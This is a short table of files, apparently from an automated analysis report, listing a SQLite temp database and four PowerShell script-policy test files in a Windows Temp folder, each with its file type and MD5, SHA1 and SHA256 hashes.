C:\Users\user\AppData\Local\Temp\N77o9w1836	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8	271D5F995996735B01672CF227C81C17	7AEAACD66A59314D1CBF4016038D3A0A956BAF33	9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3yx0pa5d.iec.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hefjqtk1.rer.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jvfivwcf.jud.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tdfgkkzi.gve.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7